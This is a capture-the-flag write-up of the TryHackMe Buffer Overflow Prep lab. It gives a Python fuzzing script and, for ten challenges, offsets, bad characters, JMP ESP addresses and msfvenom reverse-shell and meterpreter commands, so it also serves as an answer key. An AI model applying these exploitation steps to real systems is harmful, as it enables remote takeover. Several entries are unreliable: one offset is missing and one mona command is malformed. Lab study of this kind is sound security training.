Buffer Overflow Prep

Date: 29, May, 2021

Author: Dhilip Sanjay S

Click Here to go to the TryHackMe room.

• Connect to the machine using RDP:

$ xfreerdp /u:admin /p:password /v:MACHINE_IP /workarea /cert:ignore

• Here spiking is not necessary, because we know that all the commands are vulnerable.

Scripts

Fuzzing

#! /usr/bin/python3

import socket, sys, time

ip = "IP_ADDRESS"
port = 1337
timeout = 5

prefix = b'OVERFLOW1 '
payload = [
    prefix,
    b'A'*100,
]

while True:
        try:
                s = socket.socket()
                s.settimeout(timeout)
                s.connect((ip, port))
                s.recv(1024)
                s.send(b''.join(payload))
                print('Fuzzing with {} bytes'.format(len(payload[1])))
                s.recv(1024)
                s.close()
        except:
                print('Fuzzzing crashed at {} bytes'.format(len(payload[1])))
                exit(0)

        payload[1] += b'A'*100
        time.sleep(1)

Finding Offset & overwriting EIP

• Generate pattern using pattern_create:

• Find offset using pattern_offset:

Finding Bad chars

Finding Right Module

Shell code & Shell Access

OVERFLOW 1

Fuzzing

• Crash occurred at 2000 bytes

Finding Offset & overwriting EIP

• Generate Pattern of length 2500

• EIP VALUE = 6F43396E

• Exact match at offset 1978

Finding Bad chars

• Find the bad chars using mona: \x00\x07\x2e\xa0

Finding Right Module

• Find the right module using: !mona modules

• Find the jmp esp within that module excluding the bad chars: !mona jmp -r esp -m essfunc.dll -cpb "\x00\x07\x2e\xa0"

• JMP ESP address: 0x625011F7

Shell code & Shell Access

• Generate shell code using: msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=1234 EXITFUNC=thread -f py -b "\x00\x07\x2e\xa0"

• Don't forget to add nop sled.

• Run the exploit & nc:

OVERFLOW 2

Fuzzing

Finding Offset & overwriting EIP

• Generate Pattern of length 1200

• EIP VALUE = 76413176

• Exact match at offset 634

Finding Bad chars

• Find the bad chars manually: \x00\x23\x3c\x83\xba

Finding Right Module

• Find the right module using: !mona modules

• Find the jmp esp within that module excluding the bad chars: !mona jmp -r esp -m essfunc.dll -cpb "\x00\x23\x3c\x83\xba"

• JMP ESP address: 0x625011BB

Shell code & Shell Access

• Generate shell code using: msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=1234 EXITFUNC=thread -f py -b "\x00\x23\x3c\x83\xba"

• Don't forget to add nop sled.

• Run the exploit & nc:

OVERFLOW 3

Fuzzing

Finding Offset & overwriting EIP

• Generate Pattern of length 1800

• EIP VALUE = 35714234

• Exact match at offset 1274

• Found using: mona findmsp -distance <pattern length>

Finding Bad chars

• Find the bad chars using mona: \x00\x11\x40\x5f\xb8\xee

Finding Right Module

• Find the right module using: !mona modules

• Find the jmp esp within that module excluding the bad chars: !mona jmp -r esp -m essfunc.dll -cpp "\x00\x11\x40\x5f\xb8\xee"

• JMP ESP address: 62501203 (Only two addresses were available!)

Shell code & Shell Access

• Generate shell code using: msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=1234 -b "\x00\x11\x40\x5f\xb8\xee" -f py

• Note: Meterpreter shell is larger in size

• Don't forget to add nop sled.

• Run the exploit & multi/handler in msfconsole:

OVERFLOW 4

Fuzzing

Finding Offset & overwriting EIP

• Generate Pattern of length 2600

• EIP VALUE = 005c394a

• Exact match at offset 2026

Finding Bad chars

• Find the bad chars using mona: \x00\xa9\xcd\xd4

Finding Right Module

• Find the right module using: !mona modules

• Find the jmp esp within that module excluding the bad chars: !mona jmp -r esp -m essfunc.dll -cpb "\x00\xa9\xcd\xd4"

• JMP ESP address: 625011eb

Shell code & Shell Access

• Generate shell code using: msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=1234 -b "\x00\xa9\xcd\xd4" -f p

• Don't forget to add nop sled.

• Run the exploit & msfconsole multi/handler:

OVERFLOW 5

Fuzzing

Finding Offset & overwriting EIP

• Generate Pattern of 1000

• EIP VALUE = 356b4134

• Exact match at offset 314

Finding Bad chars

• Find the bad chars manually: \x00\x16\x2f\xf4\xfd

Finding Right Module

• Find the right module using: !mona modules

• Find the jmp esp within that module excluding the bad chars: !mona jmp -r esp -m essfunc.dll -cpb "\x00\x16\x2f\xf4\xfd"

• JMP ESP address: 625011d3

Shell code & Shell Access

• Generate shell code using: msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=1234 EXITFUNC=thread -f py -b "\x00\x16\x2f\xf4\xfd"

• Don't forget to add nop sled.

• Run the exploit & nc:

OVERFLOW 6

Fuzzing

Finding Offset & overwriting EIP

• Generate Pattern of 1600

• EIP VALUE = 35694234

• Exact match at offset 1034

Finding Bad chars

• Find the bad chars using mona: \x00\x08\x2c\xad

Finding Right Module

• Find the right module using: !mona modules

• Find the jmp esp within that module excluding the bad chars: !mona jmp -r esp -m essfunc.dll -cpb "\x00\x08\x2c\xad"

• JMP ESP address: 625011f7

Shell code & Shell Access

• Generate shell code using: msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=1234 EXITFUNC=thread -f py -b "\x00\x08\x2c\xad"

• Don't forget to add nop sled.

• Run the exploit & nc:

OVERFLOW 7

Fuzzing

Finding Offset & overwriting EIP

• Generate Pattern of 2000

• EIP VALUE = 72423572

• Exact match at offset 1306

Finding Bad chars

• Find the bad chars manually: \x00\x8c\xae\xbe\xfc

Finding Right Module

• Find the right module using: !mona modules

• Find the jmp esp within that module excluding the bad chars: !mona jmp -r esp -m essfunc.dll -cpb "\x00\x8c\xae\xbe\xfc"

• JMP ESP address: 62501203

Shell code & Shell Access

• Generate shell code using: msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=1234 -f py -b "\x00\x8c\xae\xbe\xfc"

• Don't forget to add nop sled.

• Run the exploit & multi/handler:

OVERFLOW 8

Fuzzing

Finding Offset & overwriting EIP

• Generate Pattern of 2300

• EIP VALUE = 68433568

• Exact match at offset 1786

Finding Bad chars

• Find the bad chars using mona: \x00\x1d\x2e\xc7\xee

Finding Right Module

• Find the right module using: !mona modules

• Find the jmp esp within that module excluding the bad chars: !mona jmp -r esp -m essfunc.dll -cpb "\x00\x1d\x2e\xc7\xee"

• JMP ESP address: 62501205

Shell code & Shell Access

• Generate shell code using: msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=1234 -f py -b "\x00\x1d\x2e\xc7\xee"

• Don't forget to add nop sled.

• Run the exploit & multi/handler:

OVERFLOW 9

Fuzzing

Finding Offset & overwriting EIP

• Generate Pattern of length 2000

• EIP VALUE = 35794234

• Exact match at offset

Finding Bad chars

• Find the bad chars using mona: \x00\x04\x3e\x3f\xe1

• Note: \x3f is not bad char (but the answer in tryhackme required 5 chars)

Finding Right Module

• Find the right module using: !mona modules

• Find the jmp esp within that module excluding the bad chars: !mona jmp -r esp -m essfunc.dll -cpb "\x00\x04\x3e\x3f\xe1"

• JMP ESP address: 625011c7

Shell code & Shell Access

• Generate shell code using: msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=1234 EXITFUNC=thread -f py -b "\x00\x04\x3e\x3f\xe1"

• Don't forget to add nop sled.

• Run the exploit & nc:

OVERFLOW 10

Fuzzing

Finding Offset & overwriting EIP

• Generate Pattern of 1000

• EIP VALUE = 41397241

• Exact match at offset 537

Finding Bad chars

• Find the bad chars using mona: \x00\xa0\xad\xbe\xde\xef

Finding Right Module

• Find the right module using: !mona modules

• Find the jmp esp within that module excluding the bad chars: !mona jmp -r esp -m essfunc.dll -cpb "!mona jmp -r esp -m essfunc.dll -cpb \x00\xa0\xad\xbe\xde\xef"

• JMP ESP address: 625011af

Shell code & Shell Access

• Generate shell code using: msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=1234 EXITFUNC=thread -f py -b "\x00\xa0\xad\xbe\xde\xef"

• Don't forget to add nop sled.

• Run the exploit & nc: